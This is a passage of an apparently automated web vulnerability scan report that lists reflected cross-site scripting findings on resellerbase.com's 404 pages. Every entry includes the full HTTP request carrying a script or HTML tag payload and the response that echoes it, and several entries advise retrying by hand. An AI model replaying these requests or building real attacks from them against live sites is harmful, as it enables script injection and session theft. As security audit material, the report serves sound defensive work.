<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service98758<script>alert(1)</script>f711038e3/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5361. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c00c<script>alert(1)</script>c5df6afa3fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts7c00c<script>alert(1)</script>c5df6afa3fe/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts7c00c<script>alert(1)</script>c5df6afa3fe/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5362. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 777fb<script>alert(1)</script>9424a29c9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes777fb<script>alert(1)</script>9424a29c9a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes777fb<script>alert(1)</script>9424a29c9a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5363. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca378<script>alert(1)</script>9665ae04711 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/search.phpca378<script>alert(1)</script>9665ae04711?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.phpca378<script>alert(1)</script>9665ae04711?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5364. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 62ed3<a>7cfd13c2101 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. On this same path, entries 2.5360 to 2.5363 and 2.5366 show a full <script>alert(1)</script> payload reflected unmodified through the same 404 template, including one placed in the query string, so a <script> payload in Submit3 should be retried by hand before this is treated as a lesser finding than those.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search62ed3<a>7cfd13c2101&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search62ed3<a>7cfd13c2101&opt=2 was not found on this server.</p>
...[SNIP]...

2.5365. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 55dec<a>d76bbdfb5d3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As with the other parameters on this path, the reflection point is the 404 page's unencoded echo of the request URI; entry 2.5366 shows a <script>alert(1)</script> payload in the same query string reflected unmodified, so retry keyword with a <script> payload by hand.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...55dec<a>d76bbdfb5d3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...55dec<a>d76bbdfb5d3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5366. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 80729<script>alert(1)</script>98edb0f8ed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2&80729<script>alert(1)</script>98edb0f8ed7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2&80729<script>alert(1)</script>98edb0f8ed7=1 was not found on this server.</p>
...[SNIP]...

2.5367. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 947d0<a>0cfb8ab720d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The reflection point is the same unencoded echo of the request URI in the 404 page that entries 2.5360 to 2.5363 and 2.5366 exploit with a full <script> payload on this path, so retry opt with a <script> payload by hand.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2947d0<a>0cfb8ab720d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2947d0<a>0cfb8ab720d was not found on this server.</p>
...[SNIP]...

2.5368. http://www.resellerbase.com/web-service/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 160d1<script>alert(1)</script>69906e57618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service160d1<script>alert(1)</script>69906e57618/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service160d1<script>alert(1)</script>69906e57618/themes/ was not found on this server.</p>
...[SNIP]...

2.5369. http://www.resellerbase.com/web-service/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee0f6<script>alert(1)</script>0cbf3bbf04c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesee0f6<script>alert(1)</script>0cbf3bbf04c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesee0f6<script>alert(1)</script>0cbf3bbf04c/ was not found on this server.</p>
...[SNIP]...

2.5370. http://www.resellerbase.com/web-service/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc815<script>alert(1)</script>0f6aa34e8e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/?cc815<script>alert(1)</script>0f6aa34e8e4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/?cc815<script>alert(1)</script>0f6aa34e8e4=1 was not found on this server.</p>
...[SNIP]...

2.5371. http://www.resellerbase.com/web-service/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea5df<script>alert(1)</script>e360c47e213 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceea5df<script>alert(1)</script>e360c47e213/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceea5df<script>alert(1)</script>e360c47e213/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5372. http://www.resellerbase.com/web-service/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3be6f<script>alert(1)</script>efdf829f89e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes3be6f<script>alert(1)</script>efdf829f89e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes3be6f<script>alert(1)</script>efdf829f89e/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5373. http://www.resellerbase.com/web-service/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d13bf<script>alert(1)</script>62aff67c4a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosd13bf<script>alert(1)</script>62aff67c4a9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosd13bf<script>alert(1)</script>62aff67c4a9/ was not found on this server.</p>
...[SNIP]...

2.5374. http://www.resellerbase.com/web-service/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c86d9<script>alert(1)</script>b8333b03f5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/?c86d9<script>alert(1)</script>b8333b03f5a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/?c86d9<script>alert(1)</script>b8333b03f5a=1 was not found on this server.</p>
...[SNIP]...

2.5375. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ed2f<script>alert(1)</script>b498d6aa36d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service4ed2f<script>alert(1)</script>b498d6aa36d/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service4ed2f<script>alert(1)</script>b498d6aa36d/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5376. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fee1e<script>alert(1)</script>bd76edbb23f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesfee1e<script>alert(1)</script>bd76edbb23f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesfee1e<script>alert(1)</script>bd76edbb23f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5377. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7936<script>alert(1)</script>3b694c5beea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosb7936<script>alert(1)</script>3b694c5beea/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosb7936<script>alert(1)</script>3b694c5beea/images/ was not found on this server.</p>
...[SNIP]...

2.5378. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be3b4<script>alert(1)</script>9d7dc659596 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesbe3b4<script>alert(1)</script>9d7dc659596/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesbe3b4<script>alert(1)</script>9d7dc659596/ was not found on this server.</p>
...[SNIP]...

2.5379. http://www.resellerbase.com/web-service/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 315d4<script>alert(1)</script>4d9bef640d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/?315d4<script>alert(1)</script>4d9bef640d7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
